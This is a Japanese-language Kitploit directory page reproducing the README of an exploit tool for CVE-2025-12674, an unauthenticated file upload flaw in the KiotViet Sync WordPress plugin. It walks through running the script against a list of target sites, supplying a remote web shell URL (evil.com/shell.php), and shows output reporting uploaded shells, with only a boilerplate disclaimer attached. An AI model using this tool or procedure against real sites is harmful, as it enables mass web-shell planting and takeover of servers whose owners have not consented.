Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-12674 — KiotViet Sync <= 1.8.5 - 認証なしの任意ファイルアップロード | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-12674
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubnxploited/cve-2025-12674

CVE-2025-12674

KiotViet Sync <= 1.8.5 - 認証なしの任意ファイルアップロード

リポジトリを見る
217ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-12674

KiotViet Sync <= 1.8.5 - 未認証の任意ファイルアップロード

🐚 KiotViet Sync <= 1.8.5 - 未認証の任意ファイルアップロード


📝 説明

WordPress 用プラグイン KiotViet Sync(1.8.5 以下のバージョン)は、create_media() 関数におけるファイルタイプ検証の欠如により、任意ファイルアップロードに対して脆弱です。
この脆弱性により、未認証の攻撃者がサーバーに任意のファイルをアップロードできるようになり、リモートコード実行につながる可能性があります。

  • CVE: CVE-2025-12674
  • CVSS: 9.8 (緊急)

🚀 使い方

  1. このリポジトリをクローンするか、スクリプトをダウンロードしてください。

  2. ターゲットを準備します:
    list.txt というファイルに1行につき1つのターゲットを記述してください。

    root@kitploit:~
    example.com
    site2.com
    http://site3.com
    
  3. エクスプロイトスクリプトを実行します:
    スクリプト名は次のとおりです:

    root@kitploit:~
    CVE-2025-12674.py
    
    root@kitploit:~
    python3 CVE-2025-12674.py
    
  4. プロンプトが表示されたら、オプションを入力してください:

    root@kitploit:~
    Enter targets file name (default: list.txt): list.txt
    Enter number of threads (default: 10): 
    Enter REMOTE SHELL URL (direct link): http://evil.com/shell.php
    ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
    │ Loaded 1 targets. Threads: 10.                                                                                           │
    ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
    ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
    │ http://nxk.ddev.site                                                                                                     │
    │ Trying KiotViet exploit...                                                                                               │
    ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
    ╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
    ║ ✔ Shell uploaded!                                                                                                        ║
    ║ Check here:                                                                                                              ║
    ║ http://nxk.ddev.site/wp-content/uploads/2026/01/                                                                         ║
    ║                                                                                                                          ║
    ╚══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
               Summary           
                                 
      Metric              Value  
     ─────────────────────────── 
      Total attempts          1  
      Successful shells       1  
      Failed attempts         0  
    
  • アップロードされたシェルの出力ディレクトリには、ファイル名は表示されません(動的に生成されるため)。

📂 出力

  • 成功したすべてのシェルのパスは shells.txt に保存されます。
  • 出力のバックアップコピーがタイムスタンプ付きで自動的に作成されます。

⚠️ 免責事項

このスクリプトは、教育目的および許可されたセキュリティテストの目的でのみ提供されています。
所有していない、または明示的なテスト許可を得ていないシステムに対する不正使用は、違法かつ非倫理的です。
作者は、誤用や引き起こされた損害について一切の責任を負いません。


👤 作者

Nxploited (Khaled Alenazi)

ツールをダウンロード